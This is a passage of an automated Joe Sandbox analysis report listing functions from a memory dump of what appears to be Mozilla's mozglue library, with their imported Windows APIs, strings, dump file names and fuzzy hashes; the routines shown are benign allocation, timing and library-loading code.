Uniqueness Score: -1.00%

Function 6BABC1F0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 19libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(wintrust.dll,?,6BABC1DE,?,00000000,?,00000000,?,6BA6779F), ref: 6BABC1F8
GetProcAddress.KERNEL32(00000000,WinVerifyTrust), ref: 6BABC217
FreeLibrary.KERNEL32(?,6BABC1DE,?,00000000,?,00000000,?,6BA6779F), ref: 6BABC22C

Strings

wintrust.dll, xrefs: 6BABC1F3
WinVerifyTrust, xrefs: 6BABC211

Memory Dump Source

Source File: 00000001.00000002.2564719007.000000006BA51000.00000020.00000001.01000000.00000012.sdmp, Offset: 6BA50000, based on PE: true

Associated: 00000001.00000002.2564543104.000000006BA50000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2565455301.000000006BACD000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2565741669.000000006BADE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2566115642.000000006BAE2000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ba50000_u5qk.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: WinVerifyTrust$wintrust.dll
API String ID: 145871493-2991032369
Opcode ID: e155b09571cfe1add585a92f7069f9857aa920eec421b8aa9a4442837d443729
Instruction ID: db1b818daf3750a4e263de0c6f6da5867c26233a69b3b4124bdfdbf417adff4d
Opcode Fuzzy Hash: e155b09571cfe1add585a92f7069f9857aa920eec421b8aa9a4442837d443729
Instruction Fuzzy Hash: 8FE09A7450A3819FDF007B658D08B0B7EE8BB86605F48822DA95482345EB76C0428B52

Uniqueness

Uniqueness Score: -1.00%

Function 6BA660E0 Relevance: 7.6, APIs: 6, Instructions: 141COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,00000000,?,6BA65FDE,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6BA660F4
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,00000000,?,6BA65FDE,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6BA66180
free.MOZGLUE(?,?,?,?,6BA65FDE,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6BA66211
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,00000000,?,6BA65FDE,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6BA66229
free.MOZGLUE(?,?,?,?,6BA65FDE,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6BA6625E
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,6BA65FDE,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6BA66271

Memory Dump Source

Source File: 00000001.00000002.2564719007.000000006BA51000.00000020.00000001.01000000.00000012.sdmp, Offset: 6BA50000, based on PE: true

Associated: 00000001.00000002.2564543104.000000006BA50000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2565455301.000000006BACD000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2565741669.000000006BADE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2566115642.000000006BAE2000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ba50000_u5qk.jbxd

Similarity

API ID: freemalloc
String ID:
API String ID: 3061335427-0
Opcode ID: 22ff85365e9c182f4e453aaf97768e787acac9f27e5bf43e243117bda99522e2
Instruction ID: 46ca5e866fe51a919e32f196da265a82c3f81504541b9103eed5cfc9fadaa83b
Opcode Fuzzy Hash: 22ff85365e9c182f4e453aaf97768e787acac9f27e5bf43e243117bda99522e2
Instruction Fuzzy Hash: 2C5169F1A042068BEF14CF6CD8807AAB7B5EF45388F144439C616DB351F739AA95CB51

Uniqueness

Uniqueness Score: -1.00%

Function 6BA9D210 Relevance: 7.6, APIs: 5, Instructions: 115stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,6BA65820,?), ref: 6BA9D21F
moz_xmalloc.MOZGLUE(00000001,?,?,6BA65820,?), ref: 6BA9D22E

Part of subcall function 6BA6CA10: malloc.MOZGLUE(?), ref: 6BA6CA26

memset.VCRUNTIME140(00000000,00000000,00000001,?,?,?,6BA65820,?), ref: 6BA9D242
free.MOZGLUE(00000000,?,?,?,?,?,?,6BA65820,?), ref: 6BA9D253

Part of subcall function 6BA75E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6BA75EDB
Part of subcall function 6BA75E90: memset.VCRUNTIME140(6BAB7765,000000E5,55CCCCCC), ref: 6BA75F27
Part of subcall function 6BA75E90: LeaveCriticalSection.KERNEL32(?), ref: 6BA75FB2

memcpy.VCRUNTIME140(00000000,00000000,?,?,?,?,?,?,?,6BA65820,?), ref: 6BA9D280

Memory Dump Source

Source File: 00000001.00000002.2564719007.000000006BA51000.00000020.00000001.01000000.00000012.sdmp, Offset: 6BA50000, based on PE: true

Associated: 00000001.00000002.2564543104.000000006BA50000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2565455301.000000006BACD000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2565741669.000000006BADE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2566115642.000000006BAE2000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ba50000_u5qk.jbxd

Similarity

API ID: CriticalSectionmemset$EnterLeavefreemallocmemcpymoz_xmallocstrlen
String ID:
API String ID: 2029485308-0
Opcode ID: 8b85cdbd7aba23336e2b0bb5740e8bd6721720fe41c62fd5d6e22954897e9aa7
Instruction ID: 7c9bb5b83d7809787a21a304856016766073d404da0d475ed7227127970381eb
Opcode Fuzzy Hash: 8b85cdbd7aba23336e2b0bb5740e8bd6721720fe41c62fd5d6e22954897e9aa7
Instruction Fuzzy Hash: F7310AB5940215AFCF00DF68D480A6EBBB5FF89744F284069D9546B341D37AE8C2CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 6BA6C150 Relevance: 7.6, APIs: 5, Instructions: 110stringtimeCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6BA6C1BC
?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6BA6C1DC

Memory Dump Source

Source File: 00000001.00000002.2564719007.000000006BA51000.00000020.00000001.01000000.00000012.sdmp, Offset: 6BA50000, based on PE: true

Associated: 00000001.00000002.2564543104.000000006BA50000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2565455301.000000006BACD000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2565741669.000000006BADE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2566115642.000000006BAE2000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ba50000_u5qk.jbxd

Similarity

API ID: Now@Stamp@mozilla@@TimeV12@_strlen
String ID:
API String ID: 1885715127-0
Opcode ID: 4fd1eea4acb1bde06ba062c1b449ff13bcd03eb234529b78b575c9f126d86027
Instruction ID: ee3c8cce63e52128d5f707c2c8e535c9277ec4d89329427e89b8df78258c1d2a
Opcode Fuzzy Hash: 4fd1eea4acb1bde06ba062c1b449ff13bcd03eb234529b78b575c9f126d86027
Instruction Fuzzy Hash: 0D41BFB1D083409FDB20DF38C58175AB7E4BF86744F44896EE8989B212F738D588CB92

Uniqueness

Uniqueness Score: -1.00%

Function 6BABA820 Relevance: 7.6, APIs: 5, Instructions: 106stringCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(6BADF770), ref: 6BABA858
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6BABA87B

Part of subcall function 6BABA9D0: memcpy.VCRUNTIME140(?,?,00000400,?,?,?,6BABA88F,00000000), ref: 6BABA9F1

_ltoa_s.API-MS-WIN-CRT-CONVERT-L1-1-0(?,?,00000020,0000000A), ref: 6BABA8FF
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6BABA90C
LeaveCriticalSection.KERNEL32(6BADF770), ref: 6BABA97E

Memory Dump Source

Source File: 00000001.00000002.2564719007.000000006BA51000.00000020.00000001.01000000.00000012.sdmp, Offset: 6BA50000, based on PE: true

Associated: 00000001.00000002.2564543104.000000006BA50000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2565455301.000000006BACD000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2565741669.000000006BADE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2566115642.000000006BAE2000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ba50000_u5qk.jbxd

Similarity

API ID: CriticalSectionstrlen$EnterLeave_ltoa_smemcpy
String ID:
API String ID: 1355178011-0
Opcode ID: 032e0136f22e54f5df6d9f15f43292f8e1e43c3c6fa44a101f61b0611a775eb7
Instruction ID: 4264c90ef1b13405e0cd706393e9f672450415986960d5e5aa642afaff41e3e2
Opcode Fuzzy Hash: 032e0136f22e54f5df6d9f15f43292f8e1e43c3c6fa44a101f61b0611a775eb7
Instruction Fuzzy Hash: 444174B4D002089FDF00DFA8D845BDEBB75FF44324F148619E866AB391EB799981CB91

Uniqueness

Uniqueness Score: -1.00%

Function 6BA54310 Relevance: 7.6, APIs: 5, Instructions: 96COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(00000010,?,6BA542D2), ref: 6BA5436A

Part of subcall function 6BA6CA10: malloc.MOZGLUE(?), ref: 6BA6CA26

memcpy.VCRUNTIME140(00000023,?,?,?,?,6BA542D2), ref: 6BA54387
moz_xmalloc.MOZGLUE(80000023,?,6BA542D2), ref: 6BA543B7
free.MOZGLUE(00000000,?,6BA542D2), ref: 6BA543EF
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,6BA542D2), ref: 6BA54406

Memory Dump Source

Source File: 00000001.00000002.2564719007.000000006BA51000.00000020.00000001.01000000.00000012.sdmp, Offset: 6BA50000, based on PE: true

Associated: 00000001.00000002.2564543104.000000006BA50000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2565455301.000000006BACD000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2565741669.000000006BADE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2566115642.000000006BAE2000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ba50000_u5qk.jbxd

Similarity

API ID: moz_xmalloc$_invalid_parameter_noinfo_noreturnfreemallocmemcpy
String ID:
API String ID: 2563754823-0
Opcode ID: 6a3279f65980834c367e8e83462c4a4a186f77dc8c8a5751db50ccb2e5d11723
Instruction ID: 4ab77130f0528c9c1b06d7d2a4ff8b678ea4c2ecfe5f038c6b60bf9a85a7fe19
Opcode Fuzzy Hash: 6a3279f65980834c367e8e83462c4a4a186f77dc8c8a5751db50ccb2e5d11723
Instruction Fuzzy Hash: EA312973A041159FDF14DE799C8056EB7A6EF40270B140639E815CB398EF34EAB08392

Uniqueness

Uniqueness Score: -1.00%

Function 6BAB0B90 Relevance: 7.6, APIs: 5, Instructions: 92timeCOMMON

Download Yara Rule

APIs

??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6BAB0BBC

Part of subcall function 6BA75C50: GetTickCount64.KERNEL32 ref: 6BA75D40
Part of subcall function 6BA75C50: EnterCriticalSection.KERNEL32(6BADF688), ref: 6BA75D67

?ProcessCreation@TimeStamp@mozilla@@SA?AV12@XZ.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6BAB0BCA
??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6BAB0BD5

Part of subcall function 6BA75C50: __aulldiv.LIBCMT ref: 6BA75DB4
Part of subcall function 6BA75C50: LeaveCriticalSection.KERNEL32(6BADF688), ref: 6BA75DED

??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6BAB0BE2
?ToSeconds@BaseTimeDurationPlatformUtils@mozilla@@SAN_J@Z.MOZGLUE(?,?), ref: 6BAB0C9A

Memory Dump Source

Source File: 00000001.00000002.2564719007.000000006BA51000.00000020.00000001.01000000.00000012.sdmp, Offset: 6BA50000, based on PE: true

Associated: 00000001.00000002.2564543104.000000006BA50000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2565455301.000000006BACD000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2565741669.000000006BADE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2566115642.000000006BAE2000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ba50000_u5qk.jbxd

Similarity

API ID: Time$StampV01@@Value@mozilla@@$CriticalSection$BaseCount64Creation@DurationEnterLeavePlatformProcessSeconds@Stamp@mozilla@@TickUtils@mozilla@@V12@__aulldiv
String ID:
API String ID: 3168180809-0
Opcode ID: 209995f8cb40f3b8602b89821f10faf6ced1253664b8ad7f73dda59a22346c19
Instruction ID: a5b29dde4765ba8c340a26f4b2d4894d70de332a383238cdd2bf7f5446c1da67
Opcode Fuzzy Hash: 209995f8cb40f3b8602b89821f10faf6ced1253664b8ad7f73dda59a22346c19
Instruction Fuzzy Hash: C531D7719187149ACB24DF38899051BB7E8EF82760F114B2EF8B5A72D0EB74D8858792

Uniqueness

Uniqueness Score: -1.00%

Function 6BA5B7A0 Relevance: 7.6, APIs: 5, Instructions: 77COMMON

Download Yara Rule

APIs

?vprint@PrintfTarget@mozilla@@QAE_NPBDPAD@Z.MOZGLUE(?,?), ref: 6BA5B7CF
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?), ref: 6BA5B808
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?), ref: 6BA5B82C
memcpy.VCRUNTIME140(00000000,?,?), ref: 6BA5B840
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6BA5B849

Memory Dump Source

Source File: 00000001.00000002.2564719007.000000006BA51000.00000020.00000001.01000000.00000012.sdmp, Offset: 6BA50000, based on PE: true

Associated: 00000001.00000002.2564543104.000000006BA50000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2565455301.000000006BACD000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2565741669.000000006BADE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2566115642.000000006BAE2000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ba50000_u5qk.jbxd

Similarity

API ID: free$?vprint@PrintfTarget@mozilla@@mallocmemcpy
String ID:
API String ID: 1977084945-0
Opcode ID: 270188aada41f41848cddb8bebc3dd67eec44d6a82f723659731249cbf4ae1cf
Instruction ID: 883e70433dc7008bfd0359e8c23a356e68c33aec06c54a0f4592d6cdefb8a403
Opcode Fuzzy Hash: 270188aada41f41848cddb8bebc3dd67eec44d6a82f723659731249cbf4ae1cf
Instruction Fuzzy Hash: 8A217AB1D002099FDF00CFA9C8855FFBBB4EF49614F048129EC06A7300E735AA84CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6BA66390 Relevance: 7.6, APIs: 5, Instructions: 72threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6BA663D0
AcquireSRWLockExclusive.KERNEL32 ref: 6BA663DF
ReleaseSRWLockExclusive.KERNEL32 ref: 6BA6640E
__Init_thread_footer.LIBCMT ref: 6BA66467
??$AddMarkerToBuffer@UTextMarker@markers@baseprofiler@mozilla@@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@baseprofiler@mozilla@@YA?AVProfileBufferBlockIndex@1@AAVProfileChunkedBuffer@1@ABV?$ProfilerStringView@D@1@ABVMarkerCategory@1@$$QAVMarkerOptions@1@UTextMarker@markers@01@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z.MOZGLUE ref: 6BA664A8

Memory Dump Source

Source File: 00000001.00000002.2564719007.000000006BA51000.00000020.00000001.01000000.00000012.sdmp, Offset: 6BA50000, based on PE: true

Associated: 00000001.00000002.2564543104.000000006BA50000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2565455301.000000006BACD000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2565741669.000000006BADE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2566115642.000000006BAE2000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ba50000_u5qk.jbxd

Similarity

API ID: Marker$D@std@@ExclusiveLockProfileTextU?$char_traits@V?$allocator@V?$basic_string@$AcquireBlockBufferBuffer@Buffer@1@Category@1@$$ChunkedCurrentD@1@D@2@@std@@@D@2@@std@@@baseprofiler@mozilla@@Index@1@Init_thread_footerMarker@markers@01@Marker@markers@baseprofiler@mozilla@@Options@1@ProfilerReleaseStringThreadView@
String ID:
API String ID: 3202982786-0
Opcode ID: 637931b497b9eb3d16a51613dd146868b18634c5c43dc6d1f34acf28cc1cdd10
Instruction ID: 3e9bcd11900ea1a4cbec98d62ce7a581602fc0d7ab6d516b3d4feeb09bde68ca
Opcode Fuzzy Hash: 637931b497b9eb3d16a51613dd146868b18634c5c43dc6d1f34acf28cc1cdd10
Instruction Fuzzy Hash: D03149F04083418FDF00DF6CD58969ABBE1EB86254F15851DD89583340D7399886CB62

Uniqueness

Uniqueness Score: -1.00%

Function 6BAB9B50 Relevance: 7.6, APIs: 5, Instructions: 53COMMON

Download Yara Rule

APIs

??KDecimal@blink@@QBE?AV01@ABV01@@Z.MOZGLUE(?,?), ref: 6BAB9B74
?ceil@Decimal@blink@@QBE?AV12@XZ.MOZGLUE ref: 6BAB9BBA
?floor@Decimal@blink@@QBE?AV12@XZ.MOZGLUE ref: 6BAB9BC8
??DDecimal@blink@@QBE?AV01@ABV01@@Z.MOZGLUE(?,?), ref: 6BAB9BD7
??GDecimal@blink@@QBE?AV01@ABV01@@Z.MOZGLUE(?,?,?,?), ref: 6BAB9BE0

Memory Dump Source

Source File: 00000001.00000002.2564719007.000000006BA51000.00000020.00000001.01000000.00000012.sdmp, Offset: 6BA50000, based on PE: true

Associated: 00000001.00000002.2564543104.000000006BA50000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2565455301.000000006BACD000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2565741669.000000006BADE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2566115642.000000006BAE2000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ba50000_u5qk.jbxd

Similarity

API ID: Decimal@blink@@$V01@V01@@$V12@$?ceil@?floor@
String ID:
API String ID: 2380687156-0
Opcode ID: ce621fbdc8bd0c02af277c28d42db02466fc82f8ba963ca0d4f4741ee9a940e9
Instruction ID: 18f354eae2008d6268b86e5c4418750196793836245613618aaf9b93fb69bb62
Opcode Fuzzy Hash: ce621fbdc8bd0c02af277c28d42db02466fc82f8ba963ca0d4f4741ee9a940e9
Instruction Fuzzy Hash: 57118232918348A7CF009F788E5189BB7BCFFD6364F008A0DF9A646141DB35D588C7A2

Uniqueness

Uniqueness Score: -1.00%

Function 6BAB5850 Relevance: 7.5, APIs: 5, Instructions: 41synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(000000FF), ref: 6BAB586C
CloseHandle.KERNEL32 ref: 6BAB5878
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 6BAB5898
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 6BAB58C9
free.MOZGLUE(00000000), ref: 6BAB58D3

Memory Dump Source

Source File: 00000001.00000002.2564719007.000000006BA51000.00000020.00000001.01000000.00000012.sdmp, Offset: 6BA50000, based on PE: true

Associated: 00000001.00000002.2564543104.000000006BA50000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2565455301.000000006BACD000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2565741669.000000006BADE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2566115642.000000006BAE2000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ba50000_u5qk.jbxd

Similarity

API ID: free$CloseHandleObjectSingleWait
String ID:
API String ID: 1910681409-0
Opcode ID: 73654e368e8ab47ca03935207a308dd9d45faeed61e3e52590c9a4ddf4cfda26
Instruction ID: 492169f0c81d47e7da7cc068fbe09bd60c26792e4a298b40af0c36bc8471f6b3
Opcode Fuzzy Hash: 73654e368e8ab47ca03935207a308dd9d45faeed61e3e52590c9a4ddf4cfda26
Instruction Fuzzy Hash: 0F014F7550C301ABDF019F55D8086077BB9EBC3725764C27DE529C2210E737D9569F81

Uniqueness

Uniqueness Score: -1.00%

Function 6BABB0C0 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 188COMMON

Download Yara Rule

APIs

free.MOZGLUE(?,?,6BABB0A6,6BABB0A6,?,6BABAF67,?,00000010,?,6BABAF67,?,00000010,00000000,?,?,6BABAB1F), ref: 6BABB1F2
?_Xlength_error@std@@YAXPBD@Z.MSVCP140(map/set<T> too long,?,?,6BABB0A6,6BABB0A6,?,6BABAF67,?,00000010,?,6BABAF67,?,00000010,00000000,?), ref: 6BABB1FF
free.MOZGLUE(?,?,?,map/set<T> too long,?,?,6BABB0A6,6BABB0A6,?,6BABAF67,?,00000010,?,6BABAF67,?,00000010), ref: 6BABB25F

Strings

map/set<T> too long, xrefs: 6BABB1FA

Memory Dump Source

Source File: 00000001.00000002.2564719007.000000006BA51000.00000020.00000001.01000000.00000012.sdmp, Offset: 6BA50000, based on PE: true

Associated: 00000001.00000002.2564543104.000000006BA50000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2565455301.000000006BACD000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2565741669.000000006BADE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2566115642.000000006BAE2000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ba50000_u5qk.jbxd

Similarity

API ID: free$Xlength_error@std@@
String ID: map/set<T> too long
API String ID: 1922495194-1285458680
Opcode ID: e8cf2d88a9272e3f8df82e2cd2378e00c09ff76d97fe1a1cc2ab89cd69b5d7bd
Instruction ID: e9f2e8bfad2deb710d9bee344d1d547fc1d2d780dc6164cc3a0dcef5720c3c9e
Opcode Fuzzy Hash: e8cf2d88a9272e3f8df82e2cd2378e00c09ff76d97fe1a1cc2ab89cd69b5d7bd
Instruction Fuzzy Hash: 76617C74A042459FDB01CF19D9C0A9ABBF5FF49314F98C69AD8694B352C339EC81CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6BAC9830 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON

Download Yara Rule

APIs

??0PrintfTarget@mozilla@@IAE@XZ.MOZGLUE ref: 6BAC985D
?vprint@PrintfTarget@mozilla@@QAE_NPBDPAD@Z.MOZGLUE(?,?), ref: 6BAC987D
MOZ_CrashPrintf.MOZGLUE(ElementAt(aIndex = %zu, aLength = %zu),?,?), ref: 6BAC98DE

Strings

ElementAt(aIndex = %zu, aLength = %zu), xrefs: 6BAC98D9

Memory Dump Source

Source File: 00000001.00000002.2564719007.000000006BA51000.00000020.00000001.01000000.00000012.sdmp, Offset: 6BA50000, based on PE: true

Associated: 00000001.00000002.2564543104.000000006BA50000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2565455301.000000006BACD000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2565741669.000000006BADE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2566115642.000000006BAE2000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ba50000_u5qk.jbxd

Similarity

API ID: Printf$Target@mozilla@@$?vprint@Crash
String ID: ElementAt(aIndex = %zu, aLength = %zu)
API String ID: 1778083764-3290996778
Opcode ID: a753f89ad7983d5e29328d84b912ed99a5f65d8279eb1972c631320cb5a4116d
Instruction ID: 35069bf82aa3b052175ab0c90035a676f79d890b50d3f1a9c44e9307b0284411
Opcode Fuzzy Hash: a753f89ad7983d5e29328d84b912ed99a5f65d8279eb1972c631320cb5a4116d
Instruction Fuzzy Hash: 8B315B71E002086FDF14AF69DC455AF77A9EF84718F40802DEA1A9B740DB399981CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 6BA5F100 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 49libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(shell32,?,6BACD020), ref: 6BA5F122
GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 6BA5F132

Strings

SHGetKnownFolderPath, xrefs: 6BA5F12C
shell32, xrefs: 6BA5F11D

Memory Dump Source

Source File: 00000001.00000002.2564719007.000000006BA51000.00000020.00000001.01000000.00000012.sdmp, Offset: 6BA50000, based on PE: true

Associated: 00000001.00000002.2564543104.000000006BA50000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2565455301.000000006BACD000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2565741669.000000006BADE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2566115642.000000006BAE2000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ba50000_u5qk.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: SHGetKnownFolderPath$shell32
API String ID: 2574300362-1045111711
Opcode ID: 0c1ffa87853dd4b924d00116aea75b6533418816d4363640b7996f8622ecb7f2
Instruction ID: 8f0180f3b003e2ab2de8ddb557e9e28cbaffd09a40a794fa89e8399fc213d62c
Opcode Fuzzy Hash: 0c1ffa87853dd4b924d00116aea75b6533418816d4363640b7996f8622ecb7f2
Instruction Fuzzy Hash: B5019E71604315AFCF008F75DC58A5B7BB8FF8A650B40451DE949D7200DB35EA41CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 6BA8CBE8 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 7COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,6BA531A7), ref: 6BA8CBF1
TerminateProcess.KERNEL32(00000000,00000003,?,6BA531A7), ref: 6BA8CBFA

Strings

<jemalloc>, xrefs: 6BA8CFFC
: (malloc) Error in VirtualFree(), xrefs: 6BA8D001

Memory Dump Source

Source File: 00000001.00000002.2564719007.000000006BA51000.00000020.00000001.01000000.00000012.sdmp, Offset: 6BA50000, based on PE: true

Associated: 00000001.00000002.2564543104.000000006BA50000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2565455301.000000006BACD000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2565741669.000000006BADE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2566115642.000000006BAE2000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ba50000_u5qk.jbxd

Similarity

API ID: Process$CurrentTerminate
String ID: : (malloc) Error in VirtualFree()$<jemalloc>
API String ID: 2429186680-2186867486
Opcode ID: 0dfe7a6d03a1afcfb74ec3dfd094c80f3cf9a2b9c5ca44968ea70087c938eb79
Instruction ID: 6fa28fd351409de6b309746e0728db30d7d3968623b73637766e00444d1e6683
Opcode Fuzzy Hash: 0dfe7a6d03a1afcfb74ec3dfd094c80f3cf9a2b9c5ca44968ea70087c938eb79
Instruction Fuzzy Hash: CEB092704083089BDB102BA4D80DB093B6CB789A01F808A2CA20182251CBB9E1018E61

Uniqueness

Uniqueness Score: -1.00%

Function 6BA62272 Relevance: 6.6, APIs: 5, Instructions: 360COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,?,?), ref: 6BA6237F
memcpy.VCRUNTIME140(?,?,00010000), ref: 6BA62B9C

Memory Dump Source

Source File: 00000001.00000002.2564719007.000000006BA51000.00000020.00000001.01000000.00000012.sdmp, Offset: 6BA50000, based on PE: true

Associated: 00000001.00000002.2564543104.000000006BA50000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2565455301.000000006BACD000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2565741669.000000006BADE000.00000004.00000001.01000000.00000012.sdmpDownload File
